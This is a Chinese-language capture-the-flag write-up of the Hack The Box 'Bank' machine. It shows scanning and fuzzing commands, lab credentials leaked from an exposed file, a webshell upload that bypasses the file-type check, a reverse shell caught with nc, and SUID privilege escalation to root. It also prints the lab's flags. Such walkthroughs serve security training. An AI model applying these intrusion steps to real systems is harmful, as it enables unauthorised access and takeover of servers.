HTB:Bank[WriteUP]

目录

连接至HTB服务器并启动靶机

信息收集

使用rustscan对靶机TCP端口进行开放扫描

提取出靶机TCP开放端口

使用nmap对靶机TCP开放端口进行脚本、服务扫描

使用nmap对靶机TCP开放端口进行漏洞、系统扫描

使用nmap对靶机常用UDP端口进行开放扫描

使用curl对域名进行访问

使用浏览器访问该域名

边界突破

使用ffuf对该域名进行路径FUZZ

访问balance-transfer接口可见大量.acc文件

点击右上角的Size按钮可对文件大小进行升序排列

通过上述凭证登录后,在左侧可见Support栏目

使用Yakit构造请求包发送Webshell

本地侧nc开始监听

权限提升

查看靶机系统内存在的用户

查找当前系统内的SUID文件


连接至HTB服务器并启动靶机

靶机IP:10.10.10.29

分配IP:10.10.16.13


信息收集

使用rustscan对靶机TCP端口进行开放扫描

复制代码
rustscan -a 10.10.10.29 -r 1-65535 --ulimit 5000 | tee res
提取出靶机TCP开放端口
复制代码
ports=$(grep syn-ack res | awk -F '/' '{print $1}' | paste -s -d ',')

┌──(root㉿kali)-[/home/kali/Desktop/temp]

└─# grep syn-ack res | awk -F '/' '{print $1}' | paste -s -d ','

22,53,80

┌──(root㉿kali)-[/home/kali/Desktop/temp]

└─# ports=(grep syn-ack res \| awk -F '/' '{print 1}' | paste -s -d ',')

┌──(root㉿kali)-[/home/kali/Desktop/temp]

└─# echo $ports

22,53,80

使用nmap对靶机TCP开放端口进行脚本、服务扫描

复制代码
nmap -sT -p$ports -sCV -Pn 10.10.10.29
使用nmap对靶机TCP开放端口进行漏洞、系统扫描
复制代码
nmap -sT -p$ports --script=vuln -O -Pn 10.10.10.29
使用nmap对靶机常用UDP端口进行开放扫描
复制代码
nmap -sU --top-ports 20 -Pn 10.10.10.29
  • 将靶机IP与bank.htb域名进行绑定

    sed -i '1i 10.10.10.29 bank.htb' /etc/hosts

┌──(root㉿kali)-[/home/kali/Desktop/temp]

└─# sed -i '1i 10.10.10.29 bank.htb' /etc/hosts

┌──(root㉿kali)-[/home/kali/Desktop/temp]

└─# head /etc/hosts -n 1

10.10.10.29 bank.htb

使用curl对域名进行访问

复制代码
curl -I http://bank.htb

┌──(root㉿kali)-[/home/kali/Desktop/temp]

└─# curl -I http://bank.htb

HTTP/1.1 302 Found

Date: Tue, 07 Jan 2025 09:12:29 GMT

Server: Apache/2.4.7 (Ubuntu)

X-Powered-By: PHP/5.5.9-1ubuntu4.21

Set-Cookie: HTBBankAuth=1ukl795lkhp59fqphdlk8s7gb0; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

location: login.php

Content-Type: text/html

使用浏览器访问该域名

边界突破

使用ffuf对该域名进行路径FUZZ

复制代码
ffuf -u http://bank.htb/FUZZ -w ../dictionary/Entire-Dir.txt -t 200
访问balance-transfer接口可见大量.acc文件
点击右上角的Size按钮可对文件大小进行升序排列
  • 点击查看这个与其他.acc文件大小不一样的文件
  • 得到凭证

名称:Christos Christopoulos

邮箱:chris@bank.htb

密码:!##HTBB4nkP4ssw0rd!##

通过上述凭证登录后,在左侧可见Support栏目

  • 点击后可见该页支持文件上传
  • 键盘按Ctrl+U查看该页原码
  • 由该页注释可知,.htb文件可充当.php文件进行解析

使用Yakit构造请求包发送Webshell

  • My Tickets栏目中可见文件成功上传
本地侧nc开始监听
复制代码
rlwrap -cAr nc -lvnp 1425
  • 直接点击Click Here访问Webshell文件,本地侧nc收到回显

┌──(root㉿kali)-[/home/kali/Desktop/temp]

└─# rlwrap -cAr nc -lvnp 1425

listening on [any] 1425 ...

connect to [10.10.16.13] from (UNKNOWN) [10.10.10.29] 45632

Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 athlon i686 GNU/Linux

13:09:56 up 3:20, 0 users, load average: 0.37, 0.09, 0.03

USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT

uid=33(www-data) gid=33(www-data) groups=33(www-data)

/bin/sh: 0: can't access tty; job control turned off

$ whoami

www-data

$ id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

  • 提升TTY

    python3 -c 'import pty;pty.spawn("/bin/bash")'


权限提升

查看靶机系统内存在的用户

复制代码
cat /etc/passwd
  • 当前用户权限可以直接查看chris下的flag文件

www-data@bank:/$ find / -name 'user.txt' -type f 2>/dev/null

find / -name 'user.txt' -type f 2>/dev/null

/home/chris/user.txt

www-data@bank:/$ cat /home/chris/user.txt

cat /home/chris/user.txt

8fc44025442af344df63cad1c33e35c8

查找当前系统内的SUID文件

复制代码
find / -perm -4000 -type f -ls 2>/dev/null
  • 直接运行**/var/htb/bin/emergency**文件即可提权至root用户

www-data@bank:/$ /var/htb/bin/emergency

/var/htb/bin/emergency

id

id

uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)

whoami

whoami

root

  • 在/root目录下找到root.txt文件

find / -name 'root.txt' -type f

find / -name 'root.txt' -type f

/root/root.txt

cat /root/root.txt

cat /root/root.txt

38e39916caa580e4ffaee0a6379444c9

相关推荐
独行soc3 小时前
#渗透测试#批量漏洞挖掘#HSC Mailinspector 任意文件读取漏洞(CVE-2024-34470)
linux·科技·安全·网络安全·面试·渗透测试
Whoisshutiao5 小时前
网安-XSS-pikachu
前端·安全·网络安全
游戏开发爱好者821 小时前
iOS重构期调试实战:架构升级中的性能与数据保障策略
websocket·网络协议·tcp/ip·http·网络安全·https·udp
安全系统学习1 天前
系统安全之大模型案例分析
前端·安全·web安全·网络安全·xss
A5rZ1 天前
Puppeteer 相关漏洞-- Google 2025 Sourceless
网络安全
Bruce_Liuxiaowei1 天前
常见高危端口风险分析与防护指南
网络·网络安全·端口·信息搜集
2501_916013741 天前
iOS 多线程导致接口乱序?抓包还原 + 请求调度优化实战
websocket·网络协议·tcp/ip·http·网络安全·https·udp
头发那是一根不剩了1 天前
双因子认证(2FA)是什么?从零设计一个安全的双因子登录接口
网络安全·系统设计·身份认证
浩浩测试一下1 天前
渗透信息收集- Web应用漏洞与指纹信息收集以及情报收集
android·前端·安全·web安全·网络安全·安全架构
Gappsong8741 天前
【Linux学习】Linux安装并配置Redis
java·linux·运维·网络安全